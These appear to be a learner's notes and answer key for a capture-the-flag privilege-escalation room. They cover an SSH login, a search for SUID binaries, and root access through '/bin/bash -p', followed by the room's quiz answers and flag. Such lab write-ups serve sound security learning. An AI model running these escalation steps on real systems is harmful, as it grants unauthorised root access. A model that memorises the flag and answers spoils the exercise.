tbfcpriv2

ssh cmnatic@10.10.32.91
password: [redacted]
suid perm for /bin/bash
	-via find / -perm -u=s -type f 2>/dev/null    or   find / -perm /4000 -type f 2>/dev/null

referring GTFOBins
	/bin/bash -p

got root user
''''

# TASK

1. What type of privilege escalation involves using a user account to exectr commands as an administrator?

Vertical

2. What is the name of the file that contains a list of users who are a part of sudo group?

sudoers

3. No answer needed

4. No answer needed

5. What are the contents of the file located at /root/flag.txt

thm{2fb10afe933296592}

===============================================================